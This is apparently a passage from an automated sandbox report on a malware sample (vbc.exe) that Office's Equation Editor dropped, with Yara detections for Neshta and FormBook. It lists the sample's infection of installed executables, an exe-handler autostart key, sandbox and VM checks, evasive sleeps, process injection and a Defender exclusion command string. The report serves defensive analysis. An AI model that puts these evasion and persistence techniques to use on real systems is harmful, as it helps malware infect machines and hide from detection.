Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Creates an undocumented autostart registry key
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (39 identical entries)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1624, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.472098761.000000000281B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1344 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1876 Thread sleep time: -38127s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\updater.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Windows\svchost.com
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\windirstat.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\WinDirStat\Uninstall.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405080
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404F6C FindFirstFileA,FindClose, 5_2_00404F6C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose, 5_2_004056A7
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 38127
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA, 5_2_00406D40
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: C:\Windows\winsxs\amd64_microsoft-windows-m..eplacementmanifests_31bf3856ad364e35_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-migration-replacement.man
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: .amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifestifest@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-drivers-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: 5_6.1.7601.17514_none_5a1a617d021715d4\microsoft-hyper-v-drivers-migration-replacement.m
Source: vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp Binary or memory string: $.microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.581083188.0000000000998000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-client-migration-replacement.man
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: microsoft-hyper-v-drivers-migration-replacement.man
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: ;+microsoft-hyper-v-migration-replacement.
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: .amd64_microsoft-hyper-v-d..switch-forceproject_31bf3856ad364e35_6.1.7601.23677_none_d4dd436f4654a5d0.manifest@
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-client-migration-replacement.mannt-Replacement.man@
Source: vbc.exe, 00000005.00000003.566737357.0000000000960000.00000004.00000001.sdmp Binary or memory string: amd64_microsoft-hyper-v-drivers-vmswitch_31bf3856ad364e35_6.1.7601.23677_none_c77ccf83b0083969.manifest
Source: vbc.exe, 00000005.00000003.590497736.00000000041E4000.00000004.00000001.sdmp Binary or memory string: .microsoft-hyper-v-migration-replacement.manent.mannt-Replacement.man@
Source: vbc.exe, 00000004.00000002.471972955.00000000027B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 5_2_00403CB4
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\Public\vbc.exe Code function: 5_2_004057D8 GetLocalTime, 5_2_004057D8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D7D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 5_2_00403D7D

Stealing of Sensitive Information:

Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY